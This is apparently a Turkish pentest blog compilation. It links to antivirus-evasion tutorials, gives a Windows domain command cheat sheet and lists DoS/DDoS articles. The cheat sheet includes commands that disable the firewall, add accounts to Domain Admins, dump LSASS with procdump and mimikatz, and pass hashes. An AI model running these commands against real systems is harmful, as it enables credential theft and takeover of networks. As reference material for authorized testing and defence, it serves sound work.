Antivirüs Atlatmak İçin Temel Yöntemler

Antivirüs Atlatmak İçin Temel Yöntemler

Kali pth-winexe aracı & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme
http://ertugrulbasaranoglu.blogspot.com.tr/2014/11/kali-pth-winexe-arac-veil-antiviruslere.html

WCE & Sysinternals Psexec & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme
http://ertugrulbasaranoglu.blogspot.com.tr/2014/11/wce-sysinternals-psexec-veil.html

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme
http://ertugrulbasaranoglu.blogspot.com.tr/2014/10/msf-psexeccommand-modulu-veil.html

Veil Kullanarak Sızma Testlerinde Antivirüs Atlatma
http://ertugrulbasaranoglu.blogspot.com.tr/2014/04/av-bypass-veil-frameworkveil-evasion.html

İpucu: PsExec Yerine WCE ile Bilgisayara Sızma
http://ertugrulbasaranoglu.blogspot.com.tr/2013/09/ipucu-psexec-yerine-wce-ile-bilgisayara.html

İpucu: Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme
http://ertugrulbasaranoglu.blogspot.com/2013/06/procdump-ve-mimikatz-ile-lsass.html

AV Bypass: Paketleyiciler
http://ertugrulbasaranoglu.blogspot.com.tr/2014/03/av-bypass-paketleyiciler.html
http://ertugrulbasaranoglu.blogspot.com.tr/2014/03/av-bypass-paketleyiciler-2.html

AV Bypass: Shellcode
http://ertugrulbasaranoglu.blogspot.com.tr/2014/03/av-bypass-shellcode.html

AV Bypass: MSF Üzerinde Payload Üretilmesi
http://ertugrulbasaranoglu.blogspot.com.tr/2014/10/av-bypass-msf-uzerinde-payload.html

AV Bypass: MsfPayload & MsfEncode
http://ertugrulbasaranoglu.blogspot.com.tr/2014/02/av-bypass-msfpayload-msfencode.html



Bypassing antivirus with a sharp syringe
http://www.exploit-db.com/wp-content/themes/exploit/docs/20420.pdf
http://carnal0wnage.attackresearch.com/2011/07/process-injection-outside-of-metasploit.html

Bypassing Anti-virus using Code Injection Technique
http://securityxploded.com/bypassing-antivirus-using-code-injection.php

Bypass Antivirus with Meterpreter as the Payload & Hyperion Fun (Stabil değil)
https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

SET: Bypass Antivirus and Hack Window Systems
http://jameslovecomputers.wordpress.com/2012/09/07/backtrack-5-powershell-alphanumeric-shellcode-injector-set-tutorial/

Java Applet Attack Method
http://pentestlab.wordpress.com/2012/03/03/java-applet-attack-method/

SecurityTube: Killing AV AND Disabling Firewall
http://www.securitytube.net/video/2666

Evading Anti-virus Detection with Metasploit
http://www.rapid7.com/resources/videos/evading-anti-virus-detection-with-metasploit.jsp

Sızma Testlerinde Antivirüs Atlatma için Alternatif Web Shell Kullanımı
http://blog.bga.com.tr/2013/01/szma-testlerinde-antivirus-atlatma-icin.html

Disabling AntiVirus when Pen Testing
http://blog.packetheader.net/2011/12/disabling-antivirus-when-pen-testing_05.html

The Ultimate Meterpreter Executable & Bypass Avs Using Inmet
http://www.securitytube.net/video/6770

Effectiveness of Antivirus in Detecting Metasploit Payloads
http://www.sans.org/reading_room/whitepapers/casestudies/effectiveness-antivirus-detecting-metasploit-payloads_2134

AV0id – Anti-Virus Bypass Metasploit Payload Generator Script
http://www.commonexploits.com/av0id-anti-virus-bypass-metasploit-payload-generator-script/

Egress Buster Reverse Shell and Bypassing AV
https://www.trustedsec.com/july-2012/egress-buster-reverse-bypassav/

Antivirüsleri Atlatma Yöntemleri - 1
https://www.bilgiguvenligi.gov.tr/yazilim-guvenligi/antivirusleri-atlatma-yontemleri-1.html

Etki Alanı Sızma Testlerinde Kullanılabilecek Komutlar

Etki Alanı Sızma Testlerinde Kullanılabilecek Komutlar

Oturumunda Olunan Kullanıcının Adı
whoami
echo %computername%\%username%

Kullanıcıya Ait Tüm Bilgiler
whoami /all

Açık portlar
netstat -ano -p TCP

Açık portlar (Saniyede bir güncellenir)
netstat -ano 1

Açık portu kullanan uygulama
netstat -abf
Örnek: TCP 192.168.0.97:2854 193.140.13.200:imaps ESTABLISHED [OUTLOOK.EXE]

RDP ile bağlanılan makineler
netstat -ano | findstr 3389 | findstr /v 0.0.0.0:3389

Zamanlanmış görevler
schtasks /query /fo LIST /v | findstr "Folder: HostName: Author: Run: TaskName: Comment:"

Zamanlanmış görev oluşturma
at \\192.168.32.62 15:00 "cmd.exe"

Çalışan servislerin listelenmesi
sc query
sc queryex            (PID değeri de içerir)

Bir servisi kapatma
net stop PolicyAgent

Servisleri Listeleme
wmic service get name, displayname, started | findstr /C:Term

Remote Desktop'u etkinleştirmek
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service remotedesktop enable

Remote Assistant'ı etkinleştirmek
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

Başka bir kullanıcı gibi komut satırını çalıştırma
runas /env /user:FENER\alex cmd

Bir servisi disable etme
sc config PlugPlay start= disabled
(Power, PlugPlay gibi kapatılamayan servisler devre dış bırakılıp, makine yeniden başlatılırsa bu servis çalışmaz.)
net stop TermService

Çalışan prosesleri servisine göre listeleme ve filtreleme
tasklist SVC | findstr /I "msseces.exe"

Çalışan proseslerin detayları
wmic process where (executablepath like "%system32%" and name!="svchost.exe" or Priority = "8" ) get HandleCount, Name, ParentProcessId, Priority, ProcessId, ThreadCount /Every:3 >  C:\Users\DenemeKullanici\Desktop\Sonuc.txt

Çalışan prosesi öldürme
taskkill /F /T /IM filezillaftp.exe

Uzaktaki Bilgisayarın Sistemi
psinfo \\172.16.4.230 -h -s -d

SYSTEM kullanıcı hakkını elde etme
PSEXEC -s cmd.exe

Uzaktaki Bilgisayarın Komut Satırına Geçmek
psexec \\172.16.4.230 -u FENER\alex -p 1907?Fenerbahce cmd.exe -i 0

Uzaktaki Bilgisayarda çalışan prosesler
tasklist /V /S 172.16.72.129 /U FENER\alex /P 1907?Fenerbahce

Makinede Açık Olan Tüm Oturumlar
query session
qwinsta

Oturumu açık kullanıcıları elde etme
query session /server:MSGE-PC

3 nolu oturumu düşürme
reset session 3 /server:MSGE-PC

Grup İlkesinin Güncellenmesi
gpupdate /force

Grup İlkesi
gpresult /z
gpresult /H C:\Users\UygulananIlke.html

Denetim Kurallarını elde etme
auditpol /get /category:*

Bir Registry kaydını elde etme
reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail

Bir Audit kaydını düzenleme
auditpol /set /subcategory:"IPsec Driver" /success:enable /failure:disable

Belli isimdeki bir dosyanın / klasörün aranması
dir H:/Muziklerim /s /b | findstr Sezen > liste.txt
tree H:/Muziklerim /F  | findstr Sezen > liste.txt

Parola politikası
net accounts
net accounts /uniquepw:5

Güvenlik duvarını aktifliğini kontrol etme
netsh firewall show opmode
netsh advfirewall show allprofiles

Güvenlik duvarını etkinsizleştirme
netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=DISABLE
netsh advfirewall set currentprofile state off

Düşürülen paketleri loglama
netsh firewall set logging droppedpackets = enable
netsh firewall set logging connections = enable
Logların düştüğü dizin:          %systemroot%\System32\LogFiles\Firewall\pfirewall.log

Kayıtlı kritik bilgileri elde etme
Get-ChildItem -Path C:\docs, C:\inetpub, C:\PerfLogs, C:\ProgramData, C:\Users -Include *.txt,  *.log, *.bat, *.reg, *.cs, *.sql, *.ps1, *.config, *.properties  -Recurse | Select-String -Pattern Password, password, Sifre, sifre, Parola, parola, Şifre, şifre, root, admin -casesensitive > C:\Windows\_Arama.txt
Uzantılar: txt, log, bat, reg, cs, sql, ps1, config, properties , ora, xml, java, doc, docx, pdf, xls, xlsx, csv, html, xhtml, htm, cmd, php, py, rb, sh, vbs, c, cfg, mhtml, asp, aspx, jsp, pl, eml, ini, inf
Kaynak: http://en.wikipedia.org/wiki/List_of_file_formats

Kullanıcı & Grup işlemleri
net user --> Tüm yerel kullanıcılar listelenir.
net user YeniKullanici --> Belli bir yerel kullanıcının özellikleri listelenir.
net user YeniKullanici Deneme123. /add
net localgroup
net localgroup "Remote Desktop Users"
net localgroup Administrators YeniKullanici /add
net user /domain
net user YeniHesap /domain
net user YeniHesap Deneme123. /domain /add
net group /domain
net group "Domain Admins" /domain
net group "Domain Admins" YeniHesap /domain /add

Bilgisayar işlemleri
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
Get-ADComputer -Filter { OperatingSystem -Like '*XP*' } -Properties OperatingSystem | Format-Table Name, OperatingSystem -Wrap -Auto

Bağlı Olunan Domain Controller
echo %LOGONSERVER%
systeminfo | findstr "Domain:"

Windows Güven İlişkileri
nltest /domain_trusts --> Tüm güven ilişkilerini listeler
nltest /dcname:Sirket --> Belli bir domaindeki PDC sunucusunu sorgular.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains --> Forest içerisindeki tüm domain'ler listelenir.
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() --> Mevcut domain için tüm güven ilişkileri (Parent-Child, 2 yönlü vs) listelenir.


Saldırı amaçlı komutlar
net use \\<Win_IP>\C$ /user:<WORKGROUP>\Tubitak  Aa123456
psexec \\<Win_IP> -u WORKGROUP\tubitak -p Aa123456 cmd.exe
mimikatz > privilege::debug > sekurlsa::logonPasswords
wce -s WORKGROUP:Administrator:<LM>:<NTLM>

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonPasswords

net time \\<Win_IP>
at \\<Win_IP> 10:32 C:\Yeni_Klasor\Procdump_Betik.bat

@echo off

C:\Yeni_Klasor\procdump.exe -accepteula -ma lsass.exe C:\Yeni_Klasor\Hedef_LSASS.dmp

Kaynaklar:
http://ertugrulbasaranoglu.blogspot.com.tr/2012/10/domainden-elde-edilebilecek-baz-onemli.html
http://rajhackingarticles.blogspot.com.tr/2014/07/hack-all-security-features-in-remote.html
http://www.networkpentest.net/p/windows-command-list.html
http://www.harmj0y.net/blog/redteaming/trusts-you-might-have-missed/
http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/
https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US#

Okunası Makaleler: DoS / DDoS

DoS/DDoS Makaleleri

DNS Hizmetine Yönelik Dos/DDoS Saldırıları
Kaynak site:
http://www.bga.com.tr/calismalar/dns_ddos.pdf

BGA 2011 DDoS Pentest ve Analiz Raporu
Kaynak site:
http://blog.bga.com.tr/2012/04/bga-2011-ddos-pentest-ve-analiz-raporu.html

DDoS Attacks on SSL: Something Old, Something New
Kaynak site:
http://ddos.arbornetworks.com/2012/04/ddos-attacks-on-ssl-something-old-something-new/

Siber Saldırı Aracı Olarak DDoS
Kaynak site:
http://www.bga.com.tr/calismalar/siber_savas_ddos.pdf

Hosting Firmalarına yönelik DDoS Saldırıları ve Çözüm Önerileri
Kaynak site:
http://www.bga.com.tr/calismalar/Hosting_DDoS.pdf

Netscreen Firewall DDoS Ayarları
Kaynak site:
http://www.bga.com.tr/calismalar/netscreen_ddos.pdf

DDoS Saldırı Analizi: DDoS Saldırılarında IP Analizi
Kaynak site:
http://www.bga.com.tr/calismalar/ddos_analizi.pdf

DDoS Saldırıları Nasıl Gerçekleştirilir?
Kaynak site:
http://www.bga.com.tr/calismalar/bga_ddos-botnet-ankara-2.pdf

SynFlood DDOS Saldırıları: SynFlood saldırıları ve korunma yolları
Kaynak site:
http://www.bga.com.tr/calismalar/synflood.pdf

Özgür Yazılımlarla DDOS Saldırılarını Engelleme
Kaynak site:
http://www.bga.com.tr/calismalar/opensource-ddos-engelleme.pdf

DOS, DDOS Atakları ve Korunma Yöntemleri
Kaynak site:
http://www.bga.com.tr/calismalar/ddos_ataklar_ve_korunma.pdf

DDoS Saldırıları ve Korunma Yolları
Kaynak site:
http://www.bga.com.tr/calismalar/ddos_ataklar_ve_korunma.pdf

Web Sunuculara Yönelik DOS/DDOS Saldırıları
Kaynak site:
http://www.bga.com.tr/calismalar/web_ddos.pdf

DDoS and Security Reports: The Arbor Networks Security Blog
Kaynak site:
http://ddos.arbornetworks.com/2012/05/stepping-forward-with-the-2012-world-ipv6-launch/

Why Firewalls and Intrusion Prevention Systems (IPS) Fall Short on DDoS Protection
Kaynak site:
http://www.arbornetworks.com/ddos/Why%20Firewalls%20and%20Intrusion%20Prevention%20Systems%20Fall%20Short%20on%20DDoS%20Protection.pdf

Protocol Analysis and Defeating DDoS in FreeBSD Kernel
Kaynak site:
http://www.nopcon.org/sunumlar/NebiSenol-FreeBSD.pdf

DDoS nedir, ne değildir?
Kaynak site:
http://www.siberguvenlik.org.tr/ddos-nedir-ne-degildir/

DDoS attacks, so simple so dangerous
Kaynak site:
http://securityaffairs.co/wordpress/8259/security/ddos-attacks-so-simple-so-dangerous.html?goback=%2Egde_37658_member_155139624

DDoS Türleri
Kaynak site:
http://blog.btrisk.com/2014/05/dos-turleri.html


DDoS Önlemleri: DDoS NEDİR, NE YAPMALIYIM?
Kaynak site:
http://ekaragol.blogspot.com.tr/2013/11/ddos-onlemleri.html


DoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
Kaynak site:
http://www.slideshare.net/bgasecurity/dos-ddos-saldrlar-ve-korunma-yntemleri-kitab